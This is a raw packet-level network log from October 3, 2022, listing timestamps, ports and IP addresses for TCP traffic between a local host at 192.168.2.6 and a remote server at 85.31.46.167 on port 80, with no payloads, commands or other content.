Oct 3, 2022 17:42:35.530004978 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530018091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530035019 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530061007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530077934 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530102968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530143023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530169010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530184031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530208111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530247927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530278921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530292034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530294895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530317068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530359983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530391932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530391932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530412912 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530453920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530458927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530494928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530514956 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530515909 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530536890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530558109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530580044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530608892 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530631065 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530648947 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530648947 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530690908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530693054 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530730963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530735970 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530792952 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530792952 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530798912 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530852079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530865908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530869961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530936956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.530956030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530956030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.530982971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531024933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531028032 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531064987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531096935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531096935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531106949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531130075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531148911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531187057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531189919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531207085 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531234026 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531275034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531276941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531318903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531337976 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531337976 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531363010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531383991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531408072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531433105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531434059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531475067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531478882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531497955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531527996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531567097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531570911 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531610012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531625986 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531644106 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531652927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.531678915 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.531722069 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554378033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554440975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554483891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554487944 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554527044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554550886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554550886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554569960 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554608107 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554613113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554649115 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554657936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554699898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554718971 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554742098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554760933 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554783106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554804087 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554825068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554858923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554867029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554934978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554945946 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.554977894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.554991961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555036068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555047989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555077076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555113077 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555119038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555165052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555171013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555200100 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555212975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555238008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555254936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555274963 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555298090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555330038 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555337906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555372000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555382013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555423975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555439949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555465937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555480957 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555517912 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555526972 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555558920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555593014 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555598974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555641890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555664062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555682898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555702925 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555723906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555754900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555766106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555807114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555843115 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555846930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555872917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555890083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555902958 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555932045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.555944920 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.555979013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.556013107 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.556021929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.556062937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.556097031 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.556103945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.556118965 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.556144953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.556181908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.556205988 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.559073925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559133053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559164047 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.559178114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559215069 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.559235096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559274912 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.559278965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559315920 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.559324026 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559361935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.559367895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559408903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559447050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.559448004 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559463024 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.559489965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559530020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.559551954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.559551954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.559653044 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.560167074 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.560225964 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.560228109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.560275078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.560349941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.560395002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.820497990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.820594072 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.336479902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.336606979 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.833508968 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.833812952 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.860805035 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.860848904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.860907078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.860934019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.860965014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.861008883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.861012936 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.861042023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.861054897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.861054897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.861085892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.861116886 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.861159086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.861272097 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.861788034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.882380962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.882380962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.888355017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888400078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888443947 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888475895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888520956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888554096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888595104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888607025 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.888628006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888662100 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.888672113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888705969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888736010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.888746023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888780117 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888809919 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.888819933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888854027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888885975 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.888895035 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888928890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.888961077 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.888969898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.889003038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.889034033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.889045000 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.889077902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.889108896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.890461922 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916030884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916052103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916089058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916104078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916116953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916131020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916142941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916155100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916167974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916177988 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916182041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916202068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916215897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916229010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916229010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916234970 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916244030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916249037 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916255951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916263103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916276932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916294098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916297913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916297913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916307926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916326046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916337967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916337967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916352034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916352987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916366100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916383028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916389942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916395903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916403055 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916410923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916415930 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916425943 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916440010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916450977 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916450977 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916459084 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916472912 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916491032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916503906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916521072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916526079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916534901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916548967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916558981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916558981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.916567087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.916663885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.917435884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.917450905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.917469978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.917483091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.917485952 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.917496920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.917535067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.917535067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.918914080 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.943798065 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.943845034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.943893909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.943927050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.943969965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944004059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944044113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944058895 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944077015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944111109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944118977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944149971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944180012 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944191933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944225073 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944256067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944267035 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944298983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944330931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944340944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944372892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944401979 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944415092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944447041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944477081 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944490910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944524050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944551945 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944564104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944597960 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944624901 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944638968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944672108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944700956 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:36.944713116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944744110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:36.944771051 CEST	49711	80	192.168.2.6	85.31.46.167
